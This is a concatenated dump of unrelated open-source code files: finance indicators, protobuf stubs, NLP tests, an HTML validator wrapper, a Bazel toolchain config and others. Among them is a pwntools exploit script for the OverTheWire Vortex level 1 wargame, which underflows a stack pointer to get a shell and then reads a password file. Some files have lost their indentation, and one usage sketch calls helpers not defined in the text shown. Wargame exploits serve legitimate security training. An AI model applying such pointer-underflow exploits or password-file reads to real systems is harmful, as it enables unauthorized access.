def url_formatter(req, colored=False, always_have_path=False, explicit_path=False, explicit_port=False):
retstr = ''
if not req.use_tls:
if colored:
retstr += Colors.RED
retstr += 'http'
if colored:
retstr += Colors.ENDC
retstr += '://'
else:
retstr += 'https://'
if colored:
retstr += color_string(req.dest_host)
else:
retstr += req.dest_host
if not ((req.use_tls and req.dest_port == 443) or \
(not req.use_tls and req.dest_port == 80) or \
explicit_port):
if colored:
retstr += ':'
retstr += Colors.MAGENTA
retstr += str(req.dest_port)
retstr += Colors.ENDC
else:
retstr += ':{}'.format(req.dest_port)
if (req.url.path and req.url.path != '/') or always_have_path:
if colored:
retstr += path_formatter(req.url.path)
else:
retstr += req.url.path
if req.url.params:
retstr += '?'
params = req.url.params.split("&")
pairs = [tuple(param.split("=")) for param in params]
paramstrs = []
for k, v in pairs:
if colored:
                paramstrs.append((Colors.GREEN + '{}' + Colors.ENDC + '=' + Colors.LGREEN + '{}' + Colors.ENDC).format(k, v))
else:
                paramstrs.append('{}={}'.format(k, v))
retstr += '&'.join(paramstrs)
if req.url.fragment:
retstr += '#%s' % req.url.fragment
return retstr
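# --- Hedged usage sketch (added for illustration; not part of the original
# pappy-proxy module). It exercises only the self-contained helpers defined
# above; the verb, status code, and path values are made-up examples.
if __name__ == '__main__':
    colored_verb = verb_color('GET') + 'GET' + Colors.ENDC
    print(colored_verb, '(visible length: %d)' % clen(colored_verb))
    print(scode_color('404') + '404 Not Found' + Colors.ENDC)
    print(path_formatter('/api/v1/users/42/profile'))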
|
pyti/moving_average_envelope.py
|
dibyajyotidash/https-github.com-kylejusticemagnuson-pyti
| 635 |
122627
|
<gh_stars>100-1000
from __future__ import absolute_import
from pyti.simple_moving_average import simple_moving_average as sma
def center_band(data, period):
"""
Center Band.
Formula:
SMA(data)
"""
cb = sma(data, period)
return cb
def upper_band(data, period, env_percentage):
"""
Upper Band.
Formula:
ub = cb(t) * (1 + env_percentage)
"""
cb = center_band(data, period)
ub = [val * (1 + float(env_percentage)) for val in cb]
return ub
def lower_band(data, period, env_percentage):
"""
Lower Band.
Formula:
lb = cb * (1 - env_percentage)
"""
cb = center_band(data, period)
lb = [val * (1 - float(env_percentage)) for val in cb]
return lb
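# --- Hedged usage sketch (not part of the original pyti module): computes the
# three envelope bands for a tiny made-up price series. The period and
# env_percentage values below are arbitrary examples.
if __name__ == '__main__':
    prices = [10, 11, 12, 13, 14, 15, 16, 17, 18, 19]
    period = 4
    env_percentage = 0.05  # a 5% envelope around the simple moving average
    print('center:', center_band(prices, period))
    print('upper: ', upper_band(prices, period, env_percentage))
    print('lower: ', lower_band(prices, period, env_percentage))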
|
ykdl/extractors/netease/__init__.py
|
panda-mute/ykdl
| 136 |
122633
|
# -*- coding: utf-8 -*-
def get_extractor(url):
if 'v.163.com/movie/' in url:
url = url.replace('v.163', 'open.163')
if 'cc.163' in url:
from . import livecc as s
elif 'live.163' in url:
from . import live as s
elif 'open.163' in url or '/opencourse/' in url:
from . import openc as s
elif 'music.163' in url:
from . import music as s
return s.get_extractor(url)
elif '3g.163' in url:
from . import m3g as s
else:
from . import video as s
return s.site, url
|
docker/examples/iris/xgboost_rpc/python/iris_pb2.py
|
smsahu/seldon-server
| 1,645 |
122650
|
<gh_stars>1000+
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: iris.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='iris.proto',
package='io.seldon.microservice.iris',
syntax='proto3',
serialized_pb=_b('\n\niris.proto\x12\x1bio.seldon.microservice.iris\"D\n\x12IrisPredictRequest\x12\n\n\x02\x66\x31\x18\x01 \x01(\x02\x12\n\n\x02\x66\x32\x18\x02 \x01(\x02\x12\n\n\x02\x66\x33\x18\x03 \x01(\x02\x12\n\n\x02\x66\x34\x18\x04 \x01(\x02\x42/\n\x1bio.seldon.microservice.irisB\x0eIrisClassifierP\x01\x62\x06proto3')
)
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_IRISPREDICTREQUEST = _descriptor.Descriptor(
name='IrisPredictRequest',
full_name='io.seldon.microservice.iris.IrisPredictRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='f1', full_name='io.seldon.microservice.iris.IrisPredictRequest.f1', index=0,
number=1, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='f2', full_name='io.seldon.microservice.iris.IrisPredictRequest.f2', index=1,
number=2, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='f3', full_name='io.seldon.microservice.iris.IrisPredictRequest.f3', index=2,
number=3, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='f4', full_name='io.seldon.microservice.iris.IrisPredictRequest.f4', index=3,
number=4, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=43,
serialized_end=111,
)
DESCRIPTOR.message_types_by_name['IrisPredictRequest'] = _IRISPREDICTREQUEST
IrisPredictRequest = _reflection.GeneratedProtocolMessageType('IrisPredictRequest', (_message.Message,), dict(
DESCRIPTOR = _IRISPREDICTREQUEST,
__module__ = 'iris_pb2'
# @@protoc_insertion_point(class_scope:io.seldon.microservice.iris.IrisPredictRequest)
))
_sym_db.RegisterMessage(IrisPredictRequest)
DESCRIPTOR.has_options = True
DESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), _b('\n\033io.seldon.microservice.irisB\016IrisClassifierP\001'))
import grpc
from grpc.beta import implementations as beta_implementations
from grpc.beta import interfaces as beta_interfaces
from grpc.framework.common import cardinality
from grpc.framework.interfaces.face import utilities as face_utilities
# @@protoc_insertion_point(module_scope)
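# --- Hedged usage sketch (added for illustration; not part of the generated
# code above). It builds the IrisPredictRequest message defined in this file
# and round-trips it through the standard protobuf serialization API; the
# feature values are made up.
if __name__ == '__main__':
    request = IrisPredictRequest(f1=5.1, f2=3.5, f3=1.4, f4=0.2)
    payload = request.SerializeToString()
    decoded = IrisPredictRequest()
    decoded.ParseFromString(payload)
    print(decoded.f1, decoded.f2, decoded.f3, decoded.f4)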
|
wargames/overthewire-vortex/level1/win.py
|
spchal/pwntools-write-ups
| 456 |
122659
|
#!/usr/bin/env python2
from pwn import *
import time
level = 1
host = 'vortex.labs.overthewire.org'
user = 'vortex%i' % level
chal = 'vortex%i' % level
password = args['PASSWORD']
passfile = '/etc/vortex_pass/<PASSWORD>%i' % (level+1)
binary = '/vortex/%s' % chal
shell = ssh(host=host, user=user, password=password)
r = shell.run(binary)
# Stack layout looks like this:
# -00000214 ptr dd ?
# -00000210 char dd ?
# -0000020C buffer db 512 dup(?)
#
# We start out in the middle of buffer
off_buffer = -0x20c
off_ptr = -0x214
ptr = off_buffer+0x100
r.send('\\' * (ptr-off_ptr-3)) # Underflow PTR, -3 so we set the high byte.
r.send('\xca') # Write the byte
r.send('\\') # Move backward again to undo the ++
r.send('\xca') # Send any byte at all, triggers e()
r.clean()
time.sleep(1)
# Win
r.send('id\n')
log.success('id: %s' % r.recv().strip())
r.send('cat /etc/vortex_pass/vortex2\n')
password = r.recv().strip()
log.success('Password: %s' % password)
print password
|
yargy/tests/test_relations.py
|
xepozz/yargy
| 250 |
122675
|
<filename>yargy/tests/test_relations.py
from yargy import (
Parser,
rule,
and_,
)
from yargy.predicates import gram
from yargy.relations import (
main,
gnc_relation,
number_relation,
gender_relation
)
from yargy.interpretation import fact
def test_name():
Name = fact(
'Name',
['first', 'last']
)
gnc = gnc_relation()
FIRST = gram('Name').interpretation(
Name.first.inflected()
).match(gnc)
LAST = gram('Surn').interpretation(
Name.last.inflected()
).match(gnc)
NAME = rule(
FIRST,
LAST
).interpretation(Name)
parser = Parser(NAME)
match = parser.match('саше иванову')
assert match.fact == Name(first='саша', last='иванов')
match = parser.match('сашу иванову')
assert match.fact == Name(first='саша', last='иванова')
match = parser.match('сашу ивановой')
assert not match
def test_main():
relation = and_(
number_relation(),
gender_relation()
)
A = rule(
gram('Surn'),
main(gram('Name'))
).match(relation)
B = gram('VERB').match(relation)
AB = rule(A, B)
parser = Parser(AB)
match = parser.match('иванов иван стал')
assert match
match = parser.match('иванов иван стали')
assert not match
match = parser.match('ивановы иван стал')
assert match
|
html5validator/validator.py
|
adamchainz/html5validator
| 266 |
122711
|
<gh_stars>100-1000
# -*- coding: utf-8 -*-
"""The main validator class."""
from __future__ import unicode_literals
import errno
import fnmatch
import logging
import os
import re
import subprocess
import sys
import vnujar
LOGGER = logging.getLogger(__name__)
DEFAULT_IGNORE_RE = [
r'\APicked up _JAVA_OPTIONS:.*',
r'\ADocument checking completed. No errors found.*',
]
DEFAULT_IGNORE = [
'{"messages":[]}'
]
DEFAULT_IGNORE_XML = [
'</messages>',
'<?xml version=\'1.0\' encoding=\'utf-8\'?>',
'<messages xmlns="http://n.validator.nu/messages/">'
]
class JavaNotFoundException(Exception):
"""Error raised is there is no Java found"""
def __str__(self):
return ('Missing Java Runtime Environment on this system. '
'The command "java" must be available.')
def all_files(directory='.', match='*.html', blacklist=None,
skip_invisible=True):
if blacklist is None:
blacklist = []
if not isinstance(match, list):
match = [match]
files = []
for root, dirnames, filenames in os.walk(directory):
# filter out blacklisted directory names
for b in blacklist:
if b in dirnames:
dirnames.remove(b)
if b in filenames:
filenames.remove(b)
if skip_invisible:
# filter out directory names starting with '.'
invisible_dirs = [d for d in dirnames if d[0] == '.']
for d in invisible_dirs:
dirnames.remove(d)
for pattern in match:
for filename in fnmatch.filter(filenames, pattern):
if skip_invisible and filename[0] == '.':
# filter out invisible files
continue
files.append(os.path.join(root, filename))
return files
def _cygwin_path_convert(filepath):
return subprocess.check_output(
['cygpath', '-w', filepath], shell=False).strip().decode('utf8')
def _normalize_string(s):
s = s.replace('“', '"')
s = s.replace('”', '"')
return s
class Validator(object):
def __init__(self,
ignore=None, ignore_re=None,
errors_only=False, detect_language=True, format=None,
stack_size=None, vnu_args=None):
self.ignore = ignore if ignore else []
self.ignore_re = ignore_re if ignore_re else []
# java options
self.stack_size = stack_size
# vnu options
self.errors_only = errors_only
self.detect_language = detect_language
self.format = format
self.vnu_args = vnu_args
# add default ignore_re
self.ignore_re += DEFAULT_IGNORE_RE
# add default ignore
self.ignore += DEFAULT_IGNORE
# process fancy quotes in ignore
self.ignore = [_normalize_string(s) for s in self.ignore]
self.ignore_re = [_normalize_string(s) for s in self.ignore_re]
# Determine jar location.
self.vnu_jar_location = (vnujar.__file__
.replace('__init__.pyc', 'vnu.jar')
.replace('__init__.py', 'vnu.jar'))
if sys.platform == 'cygwin':
self.vnu_jar_location = _cygwin_path_convert(
self.vnu_jar_location)
def _java_options(self):
java_options = []
if self.stack_size is not None:
java_options.append('-Xss{}k'.format(self.stack_size))
return java_options
def _vnu_options(self):
vnu_options = []
if self.errors_only:
vnu_options.append('--errors-only')
if not self.detect_language:
vnu_options.append('--no-langdetect')
if self.format is not None:
vnu_options.append('--format')
vnu_options.append(self.format)
if self.vnu_args is not None:
vnu_options += self.vnu_args
return vnu_options
def run_vnu(self, arguments):
try:
cmd = (['java'] + self._java_options()
+ ['-jar', self.vnu_jar_location]
+ arguments)
LOGGER.debug(cmd)
p = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
stdout, stderr = p.communicate()
except OSError as e:
if e.errno == errno.ENOENT:
raise JavaNotFoundException()
else:
raise
except subprocess.CalledProcessError as error:
            raise RuntimeError(error.output.decode('utf-8'))
return stdout.decode('utf-8'), stderr.decode('utf-8')
def validate(self, files):
if sys.platform == 'cygwin':
files = [_cygwin_path_convert(f) for f in files]
stdout, stderr = self.run_vnu(self._vnu_options() + files)
# process fancy quotes into standard quotes
stdout = _normalize_string(stdout)
stderr = _normalize_string(stderr)
err = stdout.splitlines() + stderr.splitlines()
# Removes any empty items in the list
err = list(filter(None, err))
# Prevents removal of xml tags if there are errors
if self.format == "xml" and len(err) < 4:
self.ignore = DEFAULT_IGNORE_XML
LOGGER.debug(err)
for ignored in self.ignore:
err = [line for line in err if ignored not in line]
for ignored in self.ignore_re:
regex = re.compile(ignored)
err = [line for line in err if not regex.search(line)]
if err:
for line in err:
print(line)
else:
LOGGER.info('All good.')
return len(err)
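# --- Hedged usage sketch (not part of the original module): wires the helpers
# above together roughly the way the html5validator CLI does. The directory and
# blacklist entries are examples; a Java runtime and the bundled vnu.jar are
# required for validate() to succeed.
if __name__ == '__main__':
    html_files = all_files(directory='.', match='*.html', blacklist=['node_modules'])
    validator = Validator(errors_only=True)
    error_count = validator.validate(html_files)
    sys.exit(0 if error_count == 0 else 1)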
|
robogym/envs/rearrange/blocks_duplicate.py
|
0xflotus/robogym
| 288 |
122769
|
<filename>robogym/envs/rearrange/blocks_duplicate.py
from typing import List
from robogym.envs.rearrange.blocks import BlockRearrangeEnv
from robogym.envs.rearrange.simulation.base import ObjectGroupConfig
class DuplicateBlockRearrangeEnv(BlockRearrangeEnv):
def _sample_random_object_groups(
self, dedupe_objects: bool = False
) -> List[ObjectGroupConfig]:
"""
Create one group of block objects with a random color.
Overwrite the object groups info to contain only one group for all the blocks.
"""
object_groups = super()._sample_random_object_groups()
num_objects = self.parameters.simulation_params.num_objects
first_object_group = object_groups[0]
first_object_group.count = num_objects
first_object_group.object_ids = list(range(num_objects))
object_groups = [first_object_group]
return object_groups
make_env = DuplicateBlockRearrangeEnv.build
|
test_frame/other_tests/test_import_time.py
|
DJMIN/funboost
| 333 |
122786
|
import datetime
print(1,datetime.datetime.now())
import apscheduler
print(2,datetime.datetime.now())
import gevent
print(3,datetime.datetime.now())
import eventlet
print(4,datetime.datetime.now())
import asyncio
print(5,datetime.datetime.now())
import threading
print(6,datetime.datetime.now())
import pymongo
print(7,datetime.datetime.now())
import redis
print(8,datetime.datetime.now())
import pysnooper
print(9,datetime.datetime.now())
|
exercises/ja/exc_02_02_01.py
|
Jette16/spacy-course
| 2,085 |
122792
|
<filename>exercises/ja/exc_02_02_01.py
from spacy.lang.ja import Japanese
nlp = Japanese()
doc = nlp("私はネコを飼っています")
# Look up the hash for the word "ネコ"
cat_hash = ____.____.____[____]
print(cat_hash)
# Look up the string using cat_hash
cat_string = ____.____.____[____]
print(cat_string)
|
pipelines/FBCSP.py
|
plcrodrigues/moabb
| 321 |
122794
|
import numpy as np
from pyriemann.estimation import Covariances
from pyriemann.spatialfilters import CSP
from sklearn.feature_selection import SelectKBest, mutual_info_classif
from sklearn.model_selection import GridSearchCV
from sklearn.pipeline import make_pipeline
from sklearn.svm import SVC
from moabb.pipelines.utils import FilterBank
parameters = {"C": np.logspace(-2, 2, 10)}
clf = GridSearchCV(SVC(kernel="linear"), parameters)
fb = FilterBank(make_pipeline(Covariances(estimator="oas"), CSP(nfilter=4)))
pipe = make_pipeline(fb, SelectKBest(score_func=mutual_info_classif, k=10), clf)
# this is what will be loaded
PIPELINE = {
"name": "FBCSP + optSVM",
"paradigms": ["FilterBankMotorImagery"],
"pipeline": pipe,
}
|
virtual/lib/python3.6/site-packages/pylint/test/input/func_noerror_builtin_module_test.py
|
drewheathens/The-Moringa-Tribune
| 463 |
122808
|
<reponame>drewheathens/The-Moringa-Tribune
"""test import from a builtin module"""
from __future__ import absolute_import
from math import log10
__revision__ = None
def log10_2():
"""bla bla bla"""
return log10(2)
|
snorkel/slicing/apply/dask.py
|
melonwater211/snorkel
| 2,906 |
122826
|
<filename>snorkel/slicing/apply/dask.py
from snorkel.labeling.apply.dask import ( # pragma: no cover
DaskLFApplier,
PandasParallelLFApplier,
)
class DaskSFApplier(DaskLFApplier): # pragma: no cover
"""SF applier for a Dask DataFrame.
See ``snorkel.labeling.apply.dask.DaskLFApplier`` for details.
"""
_use_recarray = True
class PandasParallelSFApplier(PandasParallelLFApplier): # pragma: no cover
"""Parallel SF applier for a Pandas DataFrame.
See ``snorkel.labeling.apply.dask.PandasParallelLFApplier`` for details.
"""
_use_recarray = True
|
SimCalorimetry/EcalTrigPrimProducers/python/ecalTriggerPrimitiveDigis_readDBOffline_cff.py
|
ckamtsikis/cmssw
| 852 |
122851
|
import FWCore.ParameterSet.Config as cms
# Trigger Primitive Producer
from SimCalorimetry.EcalTrigPrimProducers.ecalTriggerPrimitiveDigis_readDBOffline_cfi import *
|
fairlearn/metrics/_function_container.py
|
alliesaizan/fairlearn
| 1,142 |
122857
|
# Copyright (c) Microsoft Corporation and Fairlearn contributors.
# Licensed under the MIT License.
from typing import Any, Callable, Dict, Optional
import logging
import numpy as np
logger = logging.getLogger(__name__)
_DEFAULT_NAME = 'metric'
_METRIC_FUNCTION_NONE = "Found 'None' instead of metric function"
_METRIC_FUNCTION_NOT_CALLABLE = "Object passed as metric function not callable"
_SAMPLE_PARAMS_NOT_DICT = "Sample parameters must be a dictionary"
class FunctionContainer:
"""A helper class for metrics.
Parameters
----------
func : Callable
The metric function
name : str
The name of the metric. If ``None`` then the ``__name__``
property of the ``func`` is used, or if that is not available
a default is used.
sample_params : dict[str,array_like]
Sample parameters, which are to be sliced up along with
``y_true`` and ``y_pred``
"""
def __init__(self,
func: Callable,
name: Optional[str],
sample_params: Optional[Dict[str, Any]]):
"""Read a placeholder comment."""
if func is None:
raise ValueError(_METRIC_FUNCTION_NONE)
if not callable(func):
raise ValueError(_METRIC_FUNCTION_NOT_CALLABLE)
self._func = func
if name is None:
if hasattr(func, '__name__'):
self._name = func.__name__
else:
logger.warning("Supplied 'func' had no __name__ attribute")
self._name = _DEFAULT_NAME
else:
self._name = name
self._sample_params = dict()
if sample_params is not None:
if not isinstance(sample_params, dict):
raise ValueError(_SAMPLE_PARAMS_NOT_DICT)
for k, v in sample_params.items():
if v is not None:
# Coerce any sample_params to being ndarrays for easy masking
self._sample_params[k] = np.asarray(v)
@property
def func_(self) -> Callable:
"""Return the contained metric function."""
return self._func
@property
def name_(self) -> str:
"""Return the name of the metric."""
return self._name
@property
def sample_params_(self) -> Dict[str, np.ndarray]:
"""Return the dictionary of sample parameters (as ndarray)."""
return self._sample_params
def generate_sample_params_for_mask(self,
mask: np.ndarray) -> Dict[str, np.ndarray]:
"""Return the sample parameters selected by the given mask."""
curr_sample_params = dict()
for name, value in self.sample_params_.items():
curr_sample_params[name] = value[mask]
return curr_sample_params
def evaluate(self,
y_true,
y_pred,
mask: np.ndarray) -> Any:
"""Evaluate the metric for the given mask and input data.
The mask will be applied to ``y_true``, ``y_pred`` and
the sample parameters.
"""
# Following are internal sanity checks
assert isinstance(y_true, np.ndarray)
assert isinstance(y_pred, np.ndarray)
assert len(y_true) == len(y_pred)
assert len(y_true) == len(mask)
params = self.generate_sample_params_for_mask(mask)
return self.func_(y_true[mask], y_pred[mask], **params)
def evaluate_all(self,
y_true,
y_pred) -> Any:
"""Evaluate the metric on all data."""
return self.func_(y_true, y_pred, **self.sample_params_)
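# --- Hedged usage sketch (not part of the original fairlearn module):
# demonstrates the FunctionContainer API above with scikit-learn's
# recall_score. The labels, predictions, sample weights, and group mask are
# made-up examples.
if __name__ == '__main__':
    from sklearn.metrics import recall_score

    y_true = np.array([0, 1, 1, 0, 1, 1])
    y_pred = np.array([0, 1, 0, 0, 1, 1])
    weights = [1, 2, 1, 1, 2, 1]
    fc = FunctionContainer(recall_score, name=None,
                           sample_params={'sample_weight': weights})
    group_mask = np.array([True, True, True, False, False, False])
    print(fc.name_, 'on subgroup:', fc.evaluate(y_true, y_pred, group_mask))
    print(fc.name_, 'overall:   ', fc.evaluate_all(y_true, y_pred))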
|
tests/pyb/modstm.py
|
learnforpractice/micropython-cpp
| 13,648 |
122883
|
# test stm module
import stm
import pyb
# test storing a full 32-bit number
# turn on then off the A15(=yellow) LED
BSRR = 0x18
stm.mem32[stm.GPIOA + BSRR] = 0x00008000
pyb.delay(100)
print(hex(stm.mem32[stm.GPIOA + stm.GPIO_ODR] & 0x00008000))
stm.mem32[stm.GPIOA + BSRR] = 0x80000000
print(hex(stm.mem32[stm.GPIOA + stm.GPIO_ODR] & 0x00008000))
|
bazel/toolchain/aarch64-none-linux-gnu/cc_toolchain_config.bzl
|
mazzystr/kubevirt
| 3,231 |
122934
|
<gh_stars>1000+
load("@bazel_tools//tools/build_defs/cc:action_names.bzl", "ACTION_NAMES")
load(
"@bazel_tools//tools/cpp:cc_toolchain_config_lib.bzl",
"feature",
"flag_group",
"flag_set",
"tool_path",
)
all_link_actions = [
ACTION_NAMES.cpp_link_executable,
ACTION_NAMES.cpp_link_dynamic_library,
ACTION_NAMES.cpp_link_nodeps_dynamic_library,
]
all_compile_actions = [
ACTION_NAMES.assemble,
ACTION_NAMES.c_compile,
ACTION_NAMES.clif_match,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.lto_backend,
ACTION_NAMES.preprocess_assemble,
]
def _impl(ctx):
tool_paths = [
tool_path(
name = "ar",
path = "wrappers/aarch64-none-linux-gnu-ar",
),
tool_path(
name = "cpp",
path = "wrappers/aarch64-none-linux-gnu-cpp",
),
tool_path(
name = "gcc",
path = "wrappers/aarch64-none-linux-gnu-gcc",
),
tool_path(
name = "gcov",
path = "wrappers/aarch64-none-linux-gnu-gcov",
),
tool_path(
name = "ld",
path = "wrappers/aarch64-none-linux-gnu-ld",
),
tool_path(
name = "nm",
path = "wrappers/aarch64-none-linux-gnu-nm",
),
tool_path(
name = "objdump",
path = "wrappers/aarch64-none-linux-gnu-objdump",
),
tool_path(
name = "strip",
path = "wrappers/aarch64-none-linux-gnu-strip",
),
]
default_compiler_flags = feature(
name = "default_compiler_flags",
enabled = True,
flag_sets = [
flag_set(
actions = all_compile_actions,
flag_groups = [
flag_group(
flags = [
"-no-canonical-prefixes",
"-fno-canonical-system-headers",
"-Wno-builtin-macro-redefined",
"-D__DATE__=\"redacted\"",
"-D__TIMESTAMP__=\"redacted\"",
"-D__TIME__=\"redacted\"",
],
),
],
),
],
)
default_linker_flags = feature(
name = "default_linker_flags",
enabled = True,
flag_sets = [
flag_set(
actions = all_link_actions,
flag_groups = ([
flag_group(
flags = [
"-lstdc++",
],
),
]),
),
],
)
features = [
default_compiler_flags,
default_linker_flags,
]
return cc_common.create_cc_toolchain_config_info(
ctx = ctx,
cxx_builtin_include_directories = [
"/proc/self/cwd/external/aarch64-none-linux-gnu/aarch64-none-linux-gnu/include/c++/10.2.1/",
"/proc/self/cwd/external/aarch64-none-linux-gnu/aarch64-none-linux-gnu/libc/usr/include/",
"/proc/self/cwd/external/aarch64-none-linux-gnu/lib/gcc/aarch64-none-linux-gnu/10.2.1/include/",
"/proc/self/cwd/external/aarch64-none-linux-gnu/aarch64-none-linux-gnu/libc/lib/",
],
features = features,
toolchain_identifier = "aarch64-toolchain",
host_system_name = "local",
target_system_name = "unknown",
target_cpu = "unknown",
target_libc = "unknown",
compiler = "unknown",
abi_version = "unknown",
abi_libc_version = "unknown",
tool_paths = tool_paths,
)
cc_toolchain_config = rule(
implementation = _impl,
attrs = {},
provides = [CcToolchainConfigInfo],
)
|
totalpass/target.py
|
0xHJK/TotalPass
| 153 |
122936
|
#!/usr/bin/env python3
# -*- coding=utf-8 -*-
"""
Format and normalize scan target objects.
"""
import os
import re
import sys
import copy
import logging
import socket
import click
from netaddr import IPNetwork
from netaddr.core import AddrFormatError
from .settings import opts
from . import addons
class Target(object):
"""
    Target object under test; IP, port, and category differ between targets.
"""
logger = logging.getLogger("TotalPass")
def __init__(self, host=None, port=None, category=None, protocol=None, url=None):
self.logger = Target.logger
self.host = host
port = port or opts.port
port = int(re.sub(r"\D", "", str(port))) if port else None
self.port = port if port and 0 < port < 65535 else None
self.category = category or protocol
self.protocol = protocol
self.url = url
def __eq__(self, other):
return self.__dict__ == other.__dict__
def __repr__(self):
s1 = "%s://" % self.protocol if self.protocol else ""
s2 = self.host or ""
s3 = ":%s" % self.port if self.port else ""
s = s1 + s2 + s3 if s2 else ""
return s
def alive(self) -> bool:
"""
        Check whether the port is open.
"""
if not self.port:
click.secho("[x] %s No port specified." % self.host, fg="red")
return False
addr = (self.host, int(self.port))
try:
            # Check TCP
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(opts.timeout_alive)
s.connect(addr)
s.close()
click.secho("[+] [TCP] %s:%s is open." % (self.host, self.port), fg="green")
return True
except ConnectionRefusedError as e:
            # Check UDP
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.settimeout(opts.timeout_alive)
s.connect(addr)
s.close()
click.secho("[+] [UDP] %s:%s is open." % (self.host, self.port), fg="green")
return True
except Exception as e:
click.secho("[x] %s:%s is close." % (self.host, self.port), fg="red")
self.logger.debug("%s Exception: %s" % (type(e).__name__, str(e)))
return False
def load_scanners(self) -> list:
"""
        Load the scanners matching this target's category.
"""
scanners = []
if self.category and self.category in addons.__all__:
addon = sys.modules.get("%s.addons.%s" % (__package__, self.category))
self.logger.info("Creating %s %s scanners..." % (self.category, self))
for passwd in opts.passwds:
if passwd.category != self.category and passwd.category != opts.common:
continue
for cred in passwd.credentials:
scanners.append(
addon.mkscanner(
passwd,
self,
cred.get("username", ""),
cred.get("password", ""),
)
)
else:
click.secho(
"[x] #%s %s is not yet supported." % (self.category, self), fg="red"
)
return scanners
@classmethod
def parse(cls, target) -> list:
"""
        Parse the target host(s) and build a list of Target objects.
        target may be a tuple, list, str, or a file.
"""
        mid_targets = []  # intermediate results
        ret_targets = []  # final results (with ports filled in)
if isinstance(target, str):
if os.path.isfile(target):
# TODO
pass
else:
mid_targets = cls._parse_str(target)
elif isinstance(target, tuple) or isinstance(target, list):
for t in target:
mid_targets += cls._parse_str(t)
# return mid_targets
        # Fill in the port and category for each target
for t in mid_targets:
if t.category:
t.port = t.port or opts.port or opts.port_map.get(t.category, 0)
ret_targets.append(t)
else:
for cat in opts.categories:
nt = copy.deepcopy(t)
nt.category = cat
nt.port = nt.port or opts.port or opts.port_map.get(cat, 0)
ret_targets.append(nt)
return ret_targets
@classmethod
def _parse_str(cls, target) -> list:
"""
        Parse a target given in string form.
"""
cls.logger.info("Parsing target %s" % target)
if not isinstance(target, str):
cls.logger.error("Target %s is not str" % target)
return []
target = target.strip().rstrip("/")
targets = []
try:
for ip in IPNetwork(target).iter_hosts(): # (covers IP or cidr) #3,4
targets.append(Target(host=str(ip)))
except AddrFormatError:
if len(target.split(":")) == 3:
# mysql://127.0.0.1:3306
protocol = target.split(":")[0]
host = target.split(":")[1].replace("//", "")
port = target.split(":")[2]
targets.append(Target(host=host, port=port, protocol=protocol))
elif "://" in target:
# snmp://127.0.0.1
protocol = target.split(":")[0]
host = target.split(":")[1].replace("//", "")
targets.append(Target(host=host, protocol=protocol))
elif ":" in target:
# 127.0.0.1:8080
host = target.split(":")[0]
port = target.split(":")[1]
targets.append(Target(host=host, port=port))
else:
targets.append(Target(host=target))
return targets
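# --- Hedged usage sketch (not part of the original module): shows the target
# spellings that _parse_str() understands. Because this module uses relative
# imports, run it with package context (e.g. `python -m totalpass.target`);
# the hosts and ports below are examples only.
if __name__ == '__main__':
    for spec in ('mysql://127.0.0.1:3306', 'snmp://127.0.0.1', '127.0.0.1:8080'):
        print(spec, '->', Target._parse_str(spec))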
|
spk/haproxy/src/app/application/db_upgrade_16.py
|
BKSteve/spksrc
| 2,211 |
122956
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from db import *
from direct import Configuration
def upgrade():
config = Configuration()
session = Session()
frontend = session.query(Frontend).\
filter_by(name='https',
binds=':5443 ssl crt /usr/local/haproxy/var/crt/default.pem',
options=r'option http-server-close,option forwardfor,rspirep ^Location:\ http://(.*)$ Location:\ https://\1').\
first()
if frontend:
frontend.binds += ' ciphers AESGCM+AES128:AES128:AESGCM+AES256:AES256:RSA+RC4+SHA:!RSA+AES:!CAMELLIA:!aECDH:!3DES:!DSS:!PSK:!SRP:!aNULL no-sslv3'
frontend.options += r', rspadd Strict-Transport-Security:\ max-age=31536000;\ includeSubDomains'
session.commit()
config.write(restart=False)
if __name__ == '__main__':
upgrade()
|
DOC/bin/body.py
|
notinaboat/pigpio
| 109 |
122975
|
<gh_stars>100-1000
#!/usr/bin/env python3
import glob
for fn in glob.glob("src/html/*.html"):
f = open(fn)
h = f.read()
f.close()
s1,d1,e1=h.partition("<body>")
s2,d2,e2=e1.partition("</body>")
f = open("tmp/body/" + fn[9:-5] + ".body", "w")
f.write(s2)
f.close()
|
valentyusb/usbcore/tx/nrzi.py
|
rjeschmi/valentyusb
| 105 |
123000
|
#!/usr/bin/env python3
import unittest
from migen import *
from .tester import module_tester
from ..test.common import BaseUsbTestCase
class TxNRZIEncoder(Module):
"""
NRZI Encode
In order to ensure there are enough bit transitions for a receiver to recover
the clock usb uses NRZI encoding. This module processes the incoming
dj, dk, se0, and valid signals and decodes them to data values. It
also pipelines the se0 signal and passes it through unmodified.
